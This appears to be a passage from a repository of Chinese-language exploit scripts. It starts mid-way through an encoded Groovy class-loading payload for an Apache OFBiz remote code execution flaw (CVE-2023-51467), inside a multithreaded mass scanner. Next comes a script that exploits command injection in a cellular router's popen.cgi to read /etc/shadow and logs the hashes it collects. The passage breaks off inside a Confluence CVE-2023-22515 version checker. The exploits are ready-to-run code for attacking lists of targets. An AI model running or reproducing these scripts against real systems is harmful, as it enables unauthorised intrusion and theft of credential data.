u0067\u0041\u0070\u004f\u0068\u0049\u005a\u0045\u0068\u0049\u0078\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0078\u0054\u0074\u0067\u0041\u0074\u0047\u0052\u0049\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u005a\u0045\u0046\u004f\u0032\u0041\u0042\u0038\u0036\u0043\u0052\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0034\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u005a\u0045\u006c\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u004a\u0055\u0037\u0059\u0041\u0048\u0031\u0065\u006e\u0041\u0041\u0036\u006e\u0041\u0041\u0055\u0036\u0043\u0049\u0051\u0047\u0041\u0061\u0066\u0039\u0070\u0037\u0045\u0041\u0042\u0077\u0043\u0067\u0041\u004b\u0073\u0041\u0072\u0067\u0041\u0053\u0041\u004d\u0034\u0041\u0033\u0041\u0044\u0066\u0041\u0042\u0049\u0042\u0078\u0041\u0049\u0077\u0041\u006a\u004d\u0041\u004c\u0077\u0041\u002f\u0041\u0045\u0051\u0043\u0068\u0051\u0041\u0076\u0041\u0045\u0063\u0041\u0059\u0067\u004b\u0046\u0041\u0043\u0038\u0041\u005a\u0051\u0043\u0046\u0041\u006f\u0055\u0041\u004c\u0077\u0043\u0049\u0041\u006e\u0038\u0043\u0068\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u004e\u0034\u0041\u004e\u0077\u0041\u0041\u0041\u0042\u0055\u0041\u0042\u0041\u0041\u0057\u0041\u0041\u0073\u0041\u0046\u0077\u0041\u0056\u0041\u0042\u0067\u0041\u0047\u0067\u0041\u005a\u0041\u0043\u0059\u0041\u0047\u0077\u0041\u002f\u0041\u0042\u0030\u0041\u0052\u0077\u0041\u0065\u0041\u0045\u0034\u0041\u0048\u0077\u0042\u006c\u0041\u0043\u0041\u0041\u0063\u0041\u0041\u0068\u0041\u0048\u0055\u0041\u0049\u0067\u0042\u0039\u0041\u0043\u004d\u0041\u0069\u0041\u0041\u006b\u0041\u004a\u004d\u0041\u004a\u0051\u0043\u0059\u0041\u0043\u0059\u0041\u006f\u0041\u0041\u006f\u0041\u004b\u0073\u0041\u004b\u0077\u0043\u0075\u0041\u0043\u006b\u0041\u0073\u0041\u0041\u0071\u0041\u004d\u0045\u0041\u004c\u0041\u0044\u0047\u0041\u0043\u0030\u0041\u007a\u0067\u0041\u0076\u0041\u004e\u0077\u0041\u004d\u0067\u0044\u0066\u0041\u0044\u0041\u0041\u0034\u0051\u0041\u0078\u0041\u004f\u0077\u0041\u004d\u0077\u0044\u0078\u0041\u0044\u0051\u0041\u002b\u0051\u0041\u0031\u0041\u0051\u0051\u0041\u004e\u0067\u0045\u004a\u0041\u0044\u0063\u0042\u0046\u0077\u0041\u0034\u0041\u0054\u004d\u0041\u004f\u0051\u0045\u002b\u0041\u0044\u006f\u0042\u0051\u0077\u0041\u0037\u0041\u0055\u0073\u0041\u0050\u0041\u0046\u006b\u0041\u0044\u0030\u0042\u0069\u0067\u0041\u002b\u0041\u0059\u0038\u0041\u0050\u0077\u0047\u0053\u0041\u0045\u0045\u0042\u006e\u0051\u0042\u0043\u0041\u0063\u0051\u0041\u0052\u0041\u0048\u004d\u0041\u0045\u0055\u0042\u0030\u0077\u0042\u0047\u0041\u0067\u0034\u0041\u0052\u0077\u0049\u0077\u0041\u0045\u0077\u0043\u004d\u0077\u0042\u0049\u0041\u006a\u0055\u0041\u0053\u0051\u0049\u0039\u0041\u0045\u006f\u0043\u0058\u0051\u0042\u004c\u0041\u006e\u0038\u0041\u0054\u0051\u004b\u0043\u0041\u0046\u0045\u0043\u0068\u0051\u0042\u0050\u0041\u006f\u0063\u0041\u0047\u0077\u004b\u004e\u0041\u0046\u004d\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0067\u0043\u0058\u0041\u0041\u004d\u0041\u006b\u0077\u0041\u0041\u0041\u0044\u006b\u0041\u0041\u0067\u0041\u0044\u0041\u0041\u0041\u0041\u0045\u0053\u0075\u0034\u0041\u0044\u004b\u0077\u0054\u0062\u0067\u0041\u0041\u0072\u0059\u0041\u004e\u0043\u0075\u0032\u0041\u0044\u0057\u0077\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0045\u0041\u0041\u0055\u0041\u004d\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0041\u004f\u0041\u0041\u004d\u0041\u0041\u0041\u0042\u0064\u0041\u0041\u0055\u0041\u0058\u0067\u0041\u0047\u0041\u0046\u0038\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u007a\u0041\u004a\u0067\u0041\u0041\u0041\u0041\u0043\u0041\u004a\u006b\u0041\u0041\u0051\u0043\u0061\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u002f\u0077\u0041\u0045\u0041\u0041\u0051\u0041\u0041\u0041\u0043\u0062\u004b\u0038\u0059\u0041\u0044\u0042\u0049\u0032\u004b\u0037\u0059\u0041\u004e\u0035\u006b\u0041\u0042\u0068\u0049\u0034\u0073\u0043\u0075\u0032\u0041\u0044\u006c\u004d\u004b\u0078\u0049\u0036\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u0037\u004b\u0069\u0075\u0033\u0041\u0044\u0077\u0053\u0050\u0062\u0059\u0041\u0050\u006b\u0030\u0073\u0076\u0067\u0057\u0066\u0041\u0041\u0059\u0053\u0050\u0037\u0041\u0071\u004c\u0041\u004d\u0079\u0074\u0051\u0042\u0041\u004b\u0069\u0077\u0045\u004d\u0072\u0067\u0041\u0051\u0062\u0067\u0041\u004a\u0037\u0055\u0041\u0051\u0072\u0073\u0041\u0051\u0031\u006b\u0071\u0074\u0077\u0042\u0045\u0054\u0069\u0032\u0032\u0041\u0045\u0055\u0053\u0052\u0072\u0041\u0072\u0045\u006b\u0065\u0032\u0041\u0044\u0075\u005a\u0041\u0043\u0049\u0071\u004b\u0037\u0063\u0041\u0050\u0042\u0049\u0039\u0074\u0067\u0041\u002b\u0054\u0053\u0079\u002b\u0042\u005a\u0038\u0041\u0042\u0068\u004a\u0049\u0073\u0043\u006f\u0073\u0041\u007a\u0049\u0073\u0042\u0044\u004b\u0032\u0041\u0045\u006d\u0077\u004b\u0078\u004a\u004b\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u004e\u004b\u0069\u006f\u0072\u0074\u0077\u0041\u0038\u0074\u0067\u0042\u004c\u0073\u0043\u006f\u0071\u004b\u0037\u0063\u0041\u0050\u004c\u0059\u0041\u0053\u0037\u0041\u0041\u0041\u0041\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0053\u0041\u0042\u0051\u0041\u0041\u0041\u0042\u0070\u0041\u0041\u0030\u0041\u0061\u0067\u0041\u0051\u0041\u0047\u0077\u0041\u0046\u0051\u0042\u0074\u0041\u0042\u0034\u0041\u0062\u0077\u0041\u0070\u0041\u0048\u0041\u0041\u004c\u0077\u0042\u0078\u0041\u0044\u0049\u0041\u0063\u0077\u0041\u0035\u0041\u0048\u0051\u0041\u0052\u0067\u0042\u0031\u0041\u0045\u0038\u0041\u0064\u0067\u0042\u0054\u0041\u0048\u0063\u0041\u0056\u0067\u0042\u0034\u0041\u0046\u0038\u0041\u0065\u0051\u0042\u0071\u0041\u0048\u006f\u0041\u0063\u0041\u0042\u0037\u0041\u0048\u004d\u0041\u0066\u0051\u0042\u002b\u0041\u0048\u0034\u0041\u0068\u0077\u0042\u002f\u0041\u004a\u0045\u0041\u0067\u0051\u0041\u0042\u0041\u004a\u0077\u0041\u006e\u0051\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0042\u0032\u0041\u0041\u004d\u0041\u0042\u0051\u0041\u0041\u0041\u0044\u0061\u0037\u0041\u0045\u0078\u005a\u004b\u0037\u0063\u0041\u0054\u0055\u0036\u0037\u0041\u0045\u0035\u005a\u004c\u0062\u0063\u0041\u0054\u007a\u006f\u0045\u0047\u0051\u0051\u0073\u0075\u0041\u0042\u0051\u0074\u0067\u0042\u0052\u0047\u0051\u0053\u0032\u0041\u0046\u0049\u005a\u0042\u004c\u0059\u0041\u0055\u0036\u0063\u0041\u0043\u007a\u006f\u0045\u0047\u0051\u0053\u0032\u0041\u0046\u0053\u0077\u004c\u0062\u0059\u0041\u0056\u0062\u0041\u0041\u0041\u0051\u0041\u004a\u0041\u0043\u0059\u0041\u004b\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0043\u0059\u0041\u0043\u0051\u0041\u0041\u0041\u0049\u0077\u0041\u0043\u0051\u0043\u004f\u0041\u0042\u004d\u0041\u006a\u0077\u0041\u0063\u0041\u004a\u0041\u0041\u0049\u0051\u0043\u0052\u0041\u0043\u0059\u0041\u006c\u0041\u0041\u0070\u0041\u004a\u0049\u0041\u004b\u0077\u0043\u0054\u0041\u0044\u0045\u0041\u006c\u0051\u0041\u0043\u0041\u004a\u0034\u0041\u006d\u0077\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0041\u0076\u0041\u0041\u004d\u0041\u0041\u0067\u0041\u0041\u0041\u0042\u0063\u0072\u0045\u006a\u006f\u0053\u004e\u0072\u0059\u0041\u0056\u0068\u004a\u004b\u0045\u006a\u0061\u0032\u0041\u0046\u0059\u0053\u0052\u0078\u0049\u0032\u0074\u0067\u0042\u0057\u0073\u0041\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u0059\u0041\u0041\u0051\u0041\u0041\u0041\u004a\u0034\u0041\u0041\u0051\u0043\u0066\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0042\u0078\u0077\u0041\u0045\u0041\u0041\u006b\u0041\u0041\u0041\u0045\u006e\u0045\u006c\u0065\u0034\u0041\u0046\u0069\u0032\u0041\u0046\u006c\u004e\u004b\u0037\u0059\u0041\u004f\u0055\u0077\u0042\u0054\u0069\u0077\u0053\u0057\u0072\u0059\u0041\u0044\u004a\u006b\u0041\u0051\u0043\u0073\u0053\u0057\u0037\u0059\u0041\u0044\u004a\u006b\u0041\u0049\u0043\u0073\u0053\u0058\u004c\u0059\u0041\u0044\u004a\u006f\u0041\u0046\u0037\u0073\u0041\u0058\u0056\u006d\u0033\u0041\u0046\u0034\u0072\u0074\u0067\u0042\u0066\u0045\u006d\u0043\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0046\u004d\u0042\u0072\u0030\u0041\u0049\u0056\u006b\u0044\u0045\u0069\u004a\u0054\u0057\u0051\u0051\u0053\u0059\u006c\u004e\u005a\u0042\u0053\u0074\u0054\u004f\u0067\u0053\u006e\u0041\u0044\u0030\u0072\u0045\u006c\u0075\u0032\u0041\u0041\u0079\u005a\u0041\u0043\u0041\u0072\u0045\u006c\u0079\u0032\u0041\u0041\u0079\u0061\u0041\u0042\u0065\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u004b\u0037\u0059\u0041\u0058\u0078\u004a\u006a\u0074\u0067\u0042\u0066\u0074\u0067\u0042\u0068\u0054\u0041\u0061\u0039\u0041\u0043\u0046\u005a\u0041\u0078\u004a\u006b\u0055\u0031\u006b\u0045\u0045\u006d\u0056\u0054\u0057\u0051\u0055\u0072\u0055\u007a\u006f\u0045\u0075\u0041\u0042\u006d\u0047\u0051\u0053\u0032\u0041\u0047\u0064\u004f\u0075\u0077\u0042\u006f\u0057\u0053\u0032\u0032\u0041\u0047\u006d\u0033\u0041\u0047\u006f\u0053\u0061\u0037\u0059\u0041\u0062\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0047\u0032\u005a\u0041\u0041\u0073\u005a\u0042\u0062\u0059\u0041\u0062\u0071\u0063\u0041\u0042\u0052\u0049\u0032\u004f\u0067\u0061\u0037\u0041\u0047\u0068\u005a\u004c\u0062\u0059\u0041\u0062\u0037\u0063\u0041\u0061\u0068\u004a\u0072\u0074\u0067\u0042\u0073\u004f\u0067\u0057\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u0047\u0051\u0061\u0032\u0041\u0046\u0038\u005a\u0042\u0062\u0059\u0041\u0062\u005a\u006b\u0041\u0043\u0078\u006b\u0046\u0074\u0067\u0042\u0075\u0070\u0077\u0041\u0046\u0045\u006a\u0061\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0045\u0036\u0042\u0068\u006b\u0047\u004f\u0067\u0063\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0048\u0073\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0046\u0051\u0036\u0042\u0069\u0033\u0047\u0041\u0041\u0063\u0074\u0074\u0067\u0042\u0077\u0047\u0051\u0061\u0077\u004f\u0067\u0067\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0049\u0076\u0077\u0041\u0045\u0041\u004a\u0041\u0041\u002b\u0077\u0045\u0047\u0041\u0043\u0038\u0041\u006b\u0041\u0044\u0037\u0041\u0052\u006f\u0041\u0041\u0041\u0045\u0047\u0041\u0051\u0038\u0042\u0047\u0067\u0041\u0041\u0041\u0052\u006f\u0042\u0048\u0041\u0045\u0061\u0041\u0041\u0041\u0041\u0041\u0051\u0043\u0055\u0041\u0041\u0041\u0041\u0062\u0067\u0041\u0062\u0041\u0041\u0041\u0041\u0070\u0077\u0041\u004a\u0041\u004b\u0067\u0041\u0044\u0067\u0043\u0070\u0041\u0042\u0041\u0041\u0071\u0077\u0041\u005a\u0041\u004b\u0077\u0041\u004b\u0077\u0043\u0074\u0041\u0044\u0038\u0041\u0072\u0077\u0042\u0057\u0041\u004c\u0045\u0041\u0061\u0041\u0043\u0079\u0041\u0048\u0077\u0041\u0074\u0041\u0043\u0051\u0041\u004c\u0063\u0041\u006d\u0051\u0043\u0034\u0041\u004b\u0073\u0041\u0075\u0051\u0043\u002f\u0041\u004c\u006f\u0041\u0030\u0051\u0043\u0037\u0041\u0050\u0063\u0041\u0076\u0041\u0044\u0037\u0041\u004d\u0041\u0041\u002f\u0077\u0044\u0042\u0041\u0051\u004d\u0041\u0076\u0041\u0045\u0047\u0041\u004c\u0030\u0042\u0043\u0041\u0043\u002b\u0041\u0051\u0038\u0041\u0077\u0041\u0045\u0054\u0041\u004d\u0045\u0042\u0046\u0077\u0043\u002b\u0041\u0052\u006f\u0041\u0077\u0041\u0045\u0067\u0041\u004d\u0045\u0042\u004a\u0041\u0044\u0044\u0041\u0041\u0045\u0041\u006f\u0041\u0043\u0068\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0056\u006b\u0041\u0042\u0041\u0041\u004d\u0041\u0041\u0041\u0041\u0079\u0052\u004a\u0058\u0075\u0041\u0042\u0059\u0074\u0067\u0042\u005a\u0045\u006c\u0071\u0032\u0041\u0041\u0079\u0061\u0041\u0041\u006b\u0053\u0063\u0055\u0036\u006e\u0041\u0041\u0059\u0053\u0063\u006b\u0036\u0034\u0041\u0047\u0059\u0074\u0074\u0067\u0042\u007a\u004f\u0067\u0053\u0037\u0041\u0048\u0052\u005a\u004b\u0078\u0079\u0033\u0041\u0048\u0055\u0036\u0042\u0052\u006b\u0045\u0074\u0067\u0042\u0070\u004f\u0067\u0059\u005a\u0042\u004c\u0059\u0041\u0062\u007a\u006f\u0048\u0047\u0051\u0057\u0032\u0041\u0048\u0059\u0036\u0043\u0042\u006b\u0045\u0074\u0067\u0042\u0033\u004f\u0067\u006b\u005a\u0042\u0062\u0059\u0041\u0065\u0044\u006f\u004b\u0047\u0051\u0057\u0032\u0041\u0048\u006d\u0061\u0041\u0047\u0041\u005a\u0042\u0072\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0061\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0042\u0037\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0065\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u004c\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004a\u0047\u0051\u0069\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u0072\u0059\u0041\u0066\u0052\u006b\u004a\u0074\u0067\u0042\u0039\u0046\u0041\u0042\u002b\u0075\u0041\u0043\u0041\u0047\u0051\u0053\u0032\u0041\u0049\u0046\u0058\u0070\u0077\u0041\u0049\u004f\u0067\u0075\u006e\u002f\u0035\u0034\u005a\u0042\u004c\u0059\u0041\u0063\u0042\u006b\u0046\u0074\u0067\u0043\u0043\u0070\u0077\u0041\u004a\u0054\u0069\u0032\u0032\u0041\u0049\u004e\u0058\u0073\u0051\u0041\u0043\u0041\u004b\u0063\u0041\u0072\u0051\u0043\u0077\u0041\u0043\u0038\u0041\u0041\u0041\u0043\u002f\u0041\u004d\u0049\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0075\u0041\u0042\u0073\u0041\u0041\u0041\u0044\u0050\u0041\u0042\u0041\u0041\u0030\u0041\u0041\u0057\u0041\u004e\u0049\u0041\u0047\u0051\u0044\u0055\u0041\u0043\u0049\u0041\u0031\u0051\u0041\u0074\u0041\u004e\u0059\u0041\u0051\u0067\u0044\u0058\u0041\u0046\u0041\u0041\u0032\u0041\u0042\u0059\u0041\u004e\u006b\u0041\u0059\u0041\u0044\u0061\u0041\u0047\u0030\u0041\u0033\u0041\u0042\u0031\u0041\u004e\u0030\u0041\u0067\u0067\u0044\u0066\u0041\u0049\u006f\u0041\u0034\u0041\u0043\u0058\u0041\u004f\u0049\u0041\u006e\u0041\u0044\u006a\u0041\u004b\u0045\u0041\u0035\u0041\u0043\u006e\u0041\u004f\u0059\u0041\u0072\u0051\u0044\u006e\u0041\u004c\u0041\u0041\u0036\u0041\u0043\u0079\u0041\u004f\u006b\u0041\u0074\u0051\u0044\u0072\u0041\u004c\u006f\u0041\u0037\u0041\u0043\u002f\u0041\u004f\u0038\u0041\u0077\u0067\u0044\u0074\u0041\u004d\u004d\u0041\u0037\u0067\u0044\u0049\u0041\u0050\u0041\u0041\u0041\u0051\u0043\u0069\u0041\u004a\u0049\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u004c\u0041\u0041\u0044\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0051\u004b\u0069\u0071\u0030\u0041\u0045\u0041\u0071\u0074\u0041\u0042\u0043\u0074\u0067\u0043\u0045\u0074\u0067\u0043\u0046\u0073\u0051\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u006f\u0041\u0041\u0067\u0041\u0041\u0041\u0050\u0051\u0041\u0044\u0077\u0044\u0031\u0041\u0041\u006b\u0041\u006f\u0077\u0043\u006b\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0052\u0077\u0041\u0042\u0067\u0041\u0045\u0041\u0041\u0041\u0041\u0072\u0041\u0046\u004d\u0045\u006f\u0061\u0034\u0041\u0044\u004a\u004e\u004c\u0042\u004b\u0048\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0046\u0054\u0074\u0067\u0041\u0064\u004c\u004c\u0059\u0041\u004b\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0079\u0070\u0054\u0074\u0067\u0041\u0066\u0077\u0041\u0041\u0073\u0077\u0041\u0041\u0073\u0054\u004b\u0063\u0041\u0042\u0045\u0030\u0072\u0078\u0077\u0042\u0044\u0045\u006f\u0069\u0034\u0041\u0044\u0049\u0053\u0069\u0051\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u0042\u0041\u0037\u0030\u0041\u0048\u0072\u0059\u0041\u0048\u0030\u0030\u0073\u0074\u0067\u0041\u0045\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u0073\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u004b\u006c\u004f\u0032\u0041\u0042\u002f\u0041\u0041\u0043\u007a\u0041\u0041\u0043\u0078\u004d\u0070\u0077\u0041\u0045\u0054\u0053\u0076\u0048\u0041\u0044\u0051\u0053\u0069\u0037\u0067\u0041\u004d\u006b\u0030\u0073\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0031\u004f\u004c\u0053\u0079\u0032\u0041\u0043\u006f\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0071\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u004c\u004d\u0041\u0041\u004c\u0045\u0079\u006e\u0041\u0041\u0052\u004e\u004b\u0037\u0041\u0041\u0041\u0077\u0041\u0043\u0041\u0043\u0030\u0041\u004d\u0041\u0041\u0076\u0041\u0044\u0055\u0041\u0063\u0051\u0042\u0030\u0041\u0043\u0038\u0041\u0065\u0051\u0043\u006d\u0041\u004b\u006b\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0047\u0041\u0042\u0045\u0041\u0041\u0041\u0044\u0039\u0041\u0041\u0049\u0041\u002f\u0077\u0041\u0049\u0041\u0051\u0041\u0041\u004c\u0051\u0045\u0044\u0041\u0044\u0041\u0042\u0041\u0051\u0041\u0078\u0041\u0051\u0051\u0041\u004e\u0051\u0045\u0047\u0041\u0045\u0077\u0042\u0042\u0077\u0042\u0078\u0041\u0051\u006f\u0041\u0064\u0041\u0045\u0049\u0041\u0048\u0055\u0042\u0044\u0041\u0042\u0035\u0041\u0051\u0034\u0041\u0066\u0077\u0045\u0050\u0041\u0049\u0038\u0042\u0045\u0041\u0043\u006d\u0041\u0052\u004d\u0041\u0071\u0051\u0045\u0052\u0041\u004b\u006f\u0042\u0046\u0051\u0041\u0042\u0041\u004b\u0055\u0041\u0041\u0041\u0041\u0043\u0041\u004b\u0059\u003d\u005c\u0022\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0022\u0029\u003b"} 18 | 19 | res = requests.post(vulnurl, headers=headers, data=payload, verify=False, timeout=30) 20 | res.encoding = "utf-8" 21 | if res.status_code == 200 and "uid=" in res.text: 22 | print(f"目标URL: {url} ") 23 | with open(success_file, 'a') as s_file: 24 | s_file.write("=" * 65 + "\n") 25 | s_file.write(f"目标URL: {url}\n") 26 | s_file.write("响应内容: {}\n\n".format(res.text.split('\n')[0])) 27 | return True 28 | except Exception as e: 29 | print(f"发生异常:{e}") 30 | return False 31 | 32 | def scan_targets(targets, proxies=None, success_file=None): 33 | for target in targets: 34 | target = target.strip() 35 | check_for_vulnerability(target, proxies, success_file) 36 | 37 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): 38 | threads = [] 39 | 40 | for i in range(num_threads): 41 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) 42 | threads.append(thread) 43 | 44 | for thread in threads: 45 | thread.start() 46 | 47 | for thread in threads: 48 | thread.join() 49 | 50 | if __name__ == '__main__': 51 | parser = argparse.ArgumentParser(description="Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467") 52 | parser.add_argument("-u", "--url", help="目标URL") 53 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 54 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") 55 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") 56 | args = parser.parse_args() 57 | 58 | if not args.url and not args.file: 59 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 60 | exit(1) 61 | 62 | if args.url: 63 | urls = [args.url] 64 | elif args.file: 65 | with open(args.file, 'r') as file: 66 | urls = file.readlines() 67 | 68 | success_file = 'success_targets.txt' 69 | 70 | proxies = { 71 | "http": args.proxy, 72 | "https": args.proxy 73 | } if args.proxy else None 74 | 75 | multi_threaded_scan(urls, proxies, success_file, args.threads) 76 | 77 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 78 | -------------------------------------------------------------------------------- /Cellular_rce_exp.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-9-22 3 | 4 | import requests 5 | import argparse 6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 7 | 8 | def check_for_vulnerability(url, proxies={}, success_file=None): 9 | headers = { 10 | 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69', 11 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 12 | 'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 13 | 'Accept-Encoding':'gzip, deflate', 14 | 'Upgrade-Insecure-Requests':'1', 15 | 'Sec-Fetch-Dest':'document', 16 | 'Sec-Fetch-Mode':'navigate', 17 | 'Sec-Fetch-Site':'none', 18 | 'Sec-Fetch-User':'?1', 19 | 'Te':'trailers', 20 | 'Connection':'close' 21 | } 22 | try: 23 | response = requests.get(url + '/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912', headers=headers, proxies=proxies, verify=False, timeout=30) 24 | if response.status_code == 200 and "root:" in response.text: 25 | with open(success_file, 'a') as s_file: 26 | s_file.write(f"++++++++++++++++++\n") 27 | s_file.write(f"目标URL: {url}\n") 28 | s_file.write(f"Payload: ping -c 4 1.1.1.1;cat /etc/shadow&v=0.1303033443137912\n") 29 | s_file.write(f"响应内容:\n{response.text}\n\n") 30 | return True 31 | except Exception as e: 32 | print(f"发生异常:{e}") 33 | return False 34 | 35 | def scan_targets(targets, proxies={}, success_file=None): 36 | for target in targets: 37 | target = target.strip() 38 | check_for_vulnerability(target, proxies, success_file) 39 | 40 | if __name__ == '__main__': 41 | parser = argparse.ArgumentParser(description="移动路由器 Cellular Router 命令执行漏洞") 42 | parser.add_argument("-u", "--url", help="目标URL") 43 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") 44 | args = parser.parse_args() 45 | 46 | if not args.url and not args.file: 47 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") 48 | exit(1) 49 | 50 | if args.url: 51 | urls = [args.url] 52 | elif args.file: 53 | with open(args.file, 'r') as file: 54 | urls = file.readlines() 55 | 56 | proxies = { 57 | 58 | } 59 | success_file = 'success_targets.txt' 60 | 61 | for url in urls: 62 | url = url.strip() 63 | scan_targets([url], proxies, success_file) 64 | 65 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") 66 | -------------------------------------------------------------------------------- /Confluence_CVE-2023-22515_Checker.py: -------------------------------------------------------------------------------- 1 | # 作者: VulnExpo 2 | # 日期: 2023-10-20 3 | 4 | import re 5 | import requests 6 | import argparse 7 | from urllib.parse import urlparse 8 | from requests.exceptions import RequestException 9 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) 10 | 11 | def check_for_vulnerability(url, proxies={}, success_file=None): 12 | SERVER_INFO_URI = '/server-info.action' 13 | VULNERABLE_VERSIONS = ['8.0.0', '8.0.1', '8.0.2', '8.0.3', '8.0.4', '8.1.0', '8.1.1', '8.1.3', '8.1.4', '8.2.0', '8.2.1', '8.2.2', '8.2.3', '8.3.0', '8.3.1', '8.3.2', '8.4.0', '8.4.1', '8.4.2', '8.5.0', '8.5.1'] 14 | 15 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'} 16 | 17 | try: 18 | response = requests.get(url, headers=headers, verify=False, timeout=5) 19 | response.raise_for_status() 20 | except RequestException as err: 21 | print(f"连接到 {url} 时出现错误: {err}") 22 | return 23 | 24 | if 'Atlassian Confluence' not in response.text: 25 | print(f"{url} - 目标似乎不是 Atlassian Confluence. 跳过此目标.") 26 | return 27 | 28 | version_match = re.search(r'Atlassian Confluence ([\d\.]+)<', response.text) 29 | if not version_match: 30 | version_match = re.search(r'"ajs-version-number" content="([\d\.]+)"', response.text) 31 | 32 | if version_match: 33 | version = version_match.group(1) 34 | product = 'Atlassian Confluence' 35 | else: 36 | version = 'unknown' 37 | product = 'unknown' 38 | 39 | initial_vuln_status = 'not vulnerable' 40 | 41 | if version != 'unknown' and version in VULNERABLE_VERSIONS: 42 | initial_vuln_status = "potentially vulnerable" 